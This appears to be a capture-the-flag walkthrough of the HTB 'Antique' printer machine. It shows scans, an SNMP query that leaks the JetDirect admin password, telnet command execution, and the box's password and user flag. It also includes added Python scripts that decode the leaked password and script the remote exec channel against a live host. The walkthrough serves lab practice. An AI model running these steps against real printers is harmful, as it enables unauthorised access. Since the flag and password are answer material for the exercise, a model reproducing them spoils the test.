Antique

About this machine: HTB

Operating system: Linux

Skills used:

  • UDP

  • Printer

  • RC

  • Hex

We start with the first reconnaissance, a full TCP port scan:

nmap -p- --open -sS -T4 -Pn -n 10.10.11.107 -oN First_Scann

PORT   STATE SERVICE
23/tcp open  telnet

Since only telnet shows up on TCP, we also scan UDP:

nmap -sU -T4 -n 10.10.11.107 -oN udp_scann

PORT      STATE         SERVICE
20/udp    open|filtered ftp-data
123/udp   open|filtered ntp
136/udp   open|filtered profile
161/udp   open          snmp
17726/udp open|filtered unknown
19047/udp open|filtered unknown
30656/udp open|filtered unknown
40915/udp open|filtered unknown
49176/udp open|filtered unknown
49213/udp open|filtered unknown
59207/udp open|filtered unknown

Only 161/udp (SNMP) actually answered; open|filtered means the port simply did not respond, so the rest can be ignored for now.

We connect over telnet and the banner tells us it is a printer:

telnet 10.10.11.107 23
Trying 10.10.11.107...
Connected to 10.10.11.107.
Escape character is '^]'.

HP JetDirect

We look for known exploits:

searchsploit hp jetdirect

Exploit Title                                                   | Path
HP JetDirect Printer - SNMP JetAdmin Device Password Disclosure | hardware/remote/22319.txt

The advisory text in hardware/remote/22319.txt reads:

A problem with JetDirect printers could make it possible for a remote user to gain administrative access to the printer.

It has been reported that HP JetDirect printers leak the web JetAdmin device password under some circumstances. By sending an SNMP GET request to a vulnerable printer, the printer will return the hex-encoded device password to the requester. This could allow a remote user to access and change configuration of the printer.

C:>snmputil get example.printer public .1.3.6.1.4.1.11.2.3.9.1.1.13.0

We reproduce it with net-snmp's snmpget against the target, using the default "public" community string:

snmpget -v 1 -c public 10.10.11.107 .1.3.6.1.4.1.11.2.3.9.1.1.13.0
Created directory: /var/lib/snmp/cert_indexes
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135

The first 17 values are the password as hex bytes. The decimal numbers that follow are the positions of the set bits, which snmpget appends when it renders a value as BITS; they are not part of the password and must be dropped before decoding. Decoding the hex bytes with CyberChef gives:

P@ssw0rd@123!!123
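As an added example (this is not code from the original writeup), the decoding step as a small Python parser for the snmpget line above. The sample line is copied from the output shown here and embedded as constructed input. Because the hex bytes and the trailing bit-position list are both made of decimal-looking tokens, the parser does not guess where the password ends: it finds the prefix whose set bits reproduce the suffix exactly, and it also accepts the Hex-STRING and STRING renderings snmpget uses when it does not print BITS.

```python
from __future__ import annotations

import re

# Constructed sample: the value line snmpget printed for the JetDirect OID in this
# writeup. net-snmp rendered it as BITS, i.e. the raw hex bytes followed by the list of
# bit positions that are set (bit 0 is the most significant bit of the first byte).
SAMPLE = (
    "iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 "
    "31 32 33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 "
    "58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 "
    "131 134 135"
)


def set_bit_positions(data: bytes) -> list[int]:
    """Positions of the set bits in `data`, numbered as SNMP BITS numbers them."""
    return [i * 8 + b for i, byte in enumerate(data) for b in range(8) if byte & (0x80 >> b)]


def split_bits_value(tokens: list[str]) -> bytes:
    """Separate the hex-byte tokens from the trailing bit-index list.

    Tokens such as "50" or "31" are valid in both halves, so the only reliable split is
    the one where the bits set in the decoded prefix equal the suffix, element for element.
    """
    for k in range(1, len(tokens) + 1):
        head, tail = tokens[:k], tokens[k:]
        if not all(re.fullmatch(r"[0-9a-fA-F]{2}", t) for t in head):
            break  # a one-digit or three-digit token can only be a bit index
        data = bytes(int(t, 16) for t in head)
        try:
            if set_bit_positions(data) == [int(t) for t in tail]:
                return data
        except ValueError:
            continue  # tail still contains hex-only tokens: prefix is too short
    raise ValueError("could not separate hex bytes from bit-index list")


def decode_jetdirect_password(line: str) -> str:
    """Extract the device password from a single snmpget output line.

    Handles the three renderings net-snmp uses for an OCTET STRING: BITS, a single-line
    Hex-STRING, or a quoted STRING.
    """
    m = re.search(r"=\s*(BITS|Hex-STRING|STRING):\s*(.*)$", line.strip())
    if not m:
        raise ValueError("not a recognised snmpget output line")
    kind, value = m.groups()
    if kind == "STRING":
        return value.strip('"')
    tokens = value.split()
    data = bytes(int(t, 16) for t in tokens) if kind == "Hex-STRING" else split_bits_value(tokens)
    # Strip NUL padding defensively; the sample here has none.
    return data.rstrip(b"\x00").decode("ascii")


if __name__ == "__main__":
    print(decode_jetdirect_password(SAMPLE))
```

Run it as is to decode the sample; to use it live, pipe the output of the snmpget command above into decode_jetdirect_password one line at a time.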

We log in with it and look for the flag. The telnet interface accepts an exec command that runs a shell command on the box as the printer user (lp):

telnet 10.10.11.107 23
Trying 10.10.11.107...
Connected to 10.10.11.107.
Escape character is '^]'.
HP JetDirect
Password: P@ssw0rd@123!!123
exec whoami
lp
exec ls
telnet.py
user.txt
exec cat user.txt
25328e913fee9c897c9c6bdbd200c689
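The same exchange as an added Python driver, so the exec channel can be scripted instead of typed by hand. This is not code from the original writeup or from the box's telnet.py; the Password: prompt and the "exec <command>" line format are taken from the transcript above, while the assumption that a reply ends when the peer goes quiet (the box shows no prompt after a command) is mine. The replies used by ReplaySocket are constructed from the session above so the driver runs offline.

```python
from __future__ import annotations

import socket

PASSWORD_PROMPT = b"Password:"


class JetDirectShell:
    """Drive the telnet interface: wait for the Password: prompt, authenticate, then send
    'exec <command>' lines. Since no prompt follows a command, a reply is read until the
    peer is silent for `timeout` seconds (an assumption based on the transcript)."""

    def __init__(self, sock, timeout: float = 2.0):
        self.sock = sock
        self.sock.settimeout(timeout)

    def _read_until(self, marker: bytes) -> bytes:
        buf = b""
        while marker not in buf:
            chunk = self.sock.recv(4096)
            if not chunk:
                raise ConnectionError(f"peer closed before sending {marker!r}")
            buf += chunk
        return buf

    def _drain(self) -> bytes:
        buf = b""
        try:
            while chunk := self.sock.recv(4096):
                buf += chunk
        except socket.timeout:
            pass  # silence for `timeout` seconds: treat as end of reply
        return buf

    def login(self, password: str) -> str:
        banner = self._read_until(PASSWORD_PROMPT)
        self.sock.sendall(password.encode() + b"\n")
        self._drain()  # swallow any acknowledgement so it is not mixed into the first reply
        return banner.decode(errors="replace")

    def exec(self, command: str) -> str:
        self.sock.sendall(b"exec " + command.encode() + b"\n")
        return self._drain().decode(errors="replace").strip()


class ReplaySocket:
    """Offline stand-in for a socket: replays the (constructed) session from the writeup."""

    def __init__(self):
        self.replies = {  # what the box answered to each line the client sent
            b"P@ssw0rd@123!!123\n": b"",
            b"exec whoami\n": b"lp\n",
            b"exec ls\n": b"telnet.py\nuser.txt\n",
        }
        self.inbox = [b"HP JetDirect\n", b"Password: "]
        self.sent: list[bytes] = []

    def settimeout(self, t):
        pass

    def sendall(self, data: bytes):
        self.sent.append(data)
        reply = self.replies.get(data, b"")
        if reply:
            self.inbox.append(reply)

    def recv(self, n: int) -> bytes:
        if not self.inbox:
            raise socket.timeout()  # nothing left: the peer is "quiet"
        return self.inbox.pop(0)


def run_session(sock, password: str, commands: list[str]) -> dict[str, str]:
    """Log in and run each command, returning {command: output}."""
    shell = JetDirectShell(sock)
    shell.login(password)
    return {c: shell.exec(c) for c in commands}


if __name__ == "__main__":
    import sys

    if len(sys.argv) > 1:  # e.g. python3 jetdirect_exec.py 10.10.11.107
        with socket.create_connection((sys.argv[1], 23)) as s:
            print(run_session(s, "P@ssw0rd@123!!123", ["whoami", "ls"]))
    else:
        print(run_session(ReplaySocket(), "P@ssw0rd@123!!123", ["whoami", "ls"]))
```

Without arguments it runs against the replayed session; with the target address it connects to port 23 and runs the same two commands for real.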

We see that the machine listens locally on port 631 (CUPS) by default, which the TCP scan did not expose, so we set up port forwarding with Metasploit, starting from a web_delivery session:

msfconsole
[msf](Jobs:0 Agents:0) >> search web_delivery
5  exploit/multi/script/web_delivery  2013-07-19  manual  No  Script Web Delivery

[msf](Jobs:0 Agents:0) >> use 5

We will root this machine soon.
